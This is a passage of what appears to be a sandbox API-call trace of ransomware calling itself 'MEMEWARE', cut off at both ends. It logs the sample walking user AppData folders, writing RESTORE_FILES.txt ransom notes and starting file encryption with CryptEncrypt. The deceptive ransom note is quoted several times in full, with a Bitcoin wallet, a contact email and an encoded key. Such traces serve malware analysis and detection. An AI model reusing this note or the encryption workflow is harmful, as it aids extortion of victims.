an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.864] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.864] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.864] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.865] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.865] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0094.865] CloseHandle (hObject=0xd4) returned 1 [0094.865] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0094.865] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0094.865] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\RESTORE_FILES.txt") returned 55 [0094.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0094.866] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.866] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0094.878] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.878] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0094.878] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.878] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0094.878] CloseHandle (hObject=0xb4) returned 1 [0094.879] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Windows") returned -1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Program Files") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Program Files (x86)") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="$Recycle.bin") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="System Volume Information") returned -1 [0094.879] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned 36 [0094.879] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0094.879] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0094.879] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*") returned 38 [0094.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0094.880] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.880] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\.") returned 38 [0094.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.880] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\..") returned 39 [0094.880] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.880] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Program Files") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned 47 [0094.880] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0094.880] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0094.881] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned 49 [0094.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\.") returned 49 [0094.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.882] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\..") returned 50 [0094.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.882] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Windows") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files (x86)") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 86 [0094.882] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0094.882] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned 88 [0094.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.883] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.883] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\.") returned 88 [0094.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.883] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.883] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\..") returned 89 [0094.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.883] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.883] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt") returned 104 [0094.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.884] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.884] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.885] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.885] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.885] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.885] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.885] CloseHandle (hObject=0xd8) returned 1 [0094.885] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.885] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.886] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt") returned 65 [0094.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.887] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.887] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.888] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.888] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.888] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.888] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0094.888] CloseHandle (hObject=0xd4) returned 1 [0094.888] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0094.888] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0094.889] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 46 [0094.889] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0094.889] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0094.889] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned 48 [0094.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.891] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.891] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.") returned 48 [0094.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.891] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.891] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.891] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.891] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.892] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.892] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\..") returned 49 [0094.892] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.892] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.892] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.892] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.892] CryptGenRandom (in: 